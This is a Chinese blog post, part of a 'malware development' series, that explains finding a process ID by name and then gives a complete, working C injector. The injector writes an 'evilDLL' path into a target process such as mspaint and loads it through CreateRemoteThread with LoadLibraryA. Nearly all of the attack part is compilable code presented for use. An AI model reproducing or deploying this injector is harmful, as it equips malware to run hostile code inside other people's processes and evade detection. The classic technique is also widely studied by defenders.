恶意软件开发(四)通过查找进程名进行DLL注入

通过进程名查找PID

当我们编写注入器的时候,肯定是希望直接通过进程名进行注入,而不是像上一篇笔记一样通过手动输入PID进行查找。
通过进程名查找PID的步骤如下:

  • (1)创建系统中所有进程的快照
  • (2)保存系统快照中遇到的第一个进程的信息
  • (3)循环检索系统中进程的信息是否匹配需要查找的进程名

这里涉及到的函数有:
(1)CreateToolhelp32Snapshot:用于创建一个进程或者模块的快照.

HANDLE CreateToolhelp32Snapshot(
  DWORD dwFlags,  // 快照类型
  DWORD th32ProcessID  // 进程 ID,用于指定要创建快照的进程。如果为 0,则表示创建系统级别的快照。
 
);

(2)Process32First:用于获取进程快照中的第一个进程信息。

BOOL Process32First(
  HANDLE hSnapshot,  // 要遍历的进程快照的句柄
  LPPROCESSENTRY32 lppe  // 函数用于遍历进程快照,获取第一个进程的信息
);

(3)Process32Next:用于获取进程快照中的下一个进程信息。

BOOL Process32Next(
  HANDLE hSnapshot,
  LPPROCESSENTRY32 lppe
);

实现这个功能的函数完整代码如下:

int findProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;  // PROCESSENTRY32结构是描述创建快照时驻留在系统地址空间中的进程的列表中的条目
	int pid = 0;
	BOOL hResult;
	
	// 创建系统中所有进程的快照
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hSnapshot){  // INVALID_HANDLE_VALUE类似指针中的NULL
		return 0;
	}
	
	// 初始化Process32First需要使用的内存空间
	pe.dwSize = sizeof(PROCESSENTRY32);
	
	// 系统快照中遇到的第一个进程的信息
	hResult = Process32First(hSnapshot, &pe);
	
	// 检索有关进程的信息
	while (hResult) {
		// 如果找到进程就退出
		if (strcmp(procname, pe.szExeFile) == 0) {
			pid = pe.th32ProcessID;
			break;
		}
		hResult = Process32Next(hSnapshot, &pe);
	} 
	// 关闭快照句柄,避免资源泄漏
	CloseHandle(hSnapshot);
	return pid;
}

修改注入器

剩下的代码和上一篇中的一样,这里只是在上一篇笔记的基础上,将手动输入PID替换为通过进程名查找PID。
修改之后的注入文件完整代码如下,dll文件的生成参照上一篇笔记

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
 
int findProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;
	BOOL hResult;
	
	// 查找系统中所有进程的快照
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hSnapshot){
		return 0;
	}
	
	// 初始化Process32First需要使用的内存空间
	pe.dwSize = sizeof(PROCESSENTRY32);
	
	// 系统快照中遇到的第一个进程的信息
	hResult = Process32First(hSnapshot, &pe);
	
	// 检索有关进程的信息
	while (hResult) {
		// 如果找到进程就退出
		if (strcmp(procname, pe.szExeFile) == 0) {
			pid = pe.th32ProcessID;
			break;
		}
		hResult = Process32Next(hSnapshot, &pe);
	} 
	// 关闭CreateToolhelp32Snapshot
	CloseHandle(hSnapshot);
	return pid;
} 
 
char evilDLL[] = "C:\\Users\\16537\\Desktop\\test.dll";
unsigned int evilLen = sizeof(evilDLL) + 1;
 
int main(int argc, char* argv[]) {
	int pid = 0;	// 进程id 
	HANDLE ph; // 进程句柄 
	HANDLE rt; // 远程线程 
	LPVOID rb; // 远程内存 
 
	// 获取LoadLibraryA函数的地址
	HMODULE hKernel32 = GetModuleHandle("Kernel32");
	VOID *lb = (VOID *)GetProcAddress(hKernel32, "LoadLibraryA");
 
	// 通过进程名称查找进程id
	pid = findProc(argv[1]);
	if (pid == 0) {
		printf("PID not Found!\n");
		return -1;
	}  else {
		printf("PID = %d\n", pid);
	}
	
	
	// 打开目标进程
	ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));
 
	// 分配远程进程的内存 
	rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
 
	// 在进程间复制dll 
	WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL);
 
	// 在目标进程中创建新的线程
	rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL);
  
	// 等待远程线程执行结束
    WaitForSingleObject(rt, INFINITE);
 
    // 清理内存空间
    VirtualFreeEx(ph, rb, 0, evilLen);
  
	CloseHandle(ph);
	CloseHandle(rt);
	
  	return 0;
}

接着,将dll注入到mapaint.exe中:

并且在mapaint.exe的内存中可以看到我们注入的内容。

posted @   顾北清  阅读(176)  评论(0编辑  收藏  举报
相关博文:
· 恶意软件开发(三)经典DLL注入流程
· 恶意软件开发(二)经典代码注入流程
· 进程注入原理——提权会用到本质上就是在进程的内存地址上做一些hack改动
· 恶意代码分析实战 隐蔽的恶意代码启动 lab12-1 12-2 12-3 12-4 进程注入、进程替换、hook procmon监控os api调用不行 数据分析还是要sysmon
· DLL注入技术(总体介绍)
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛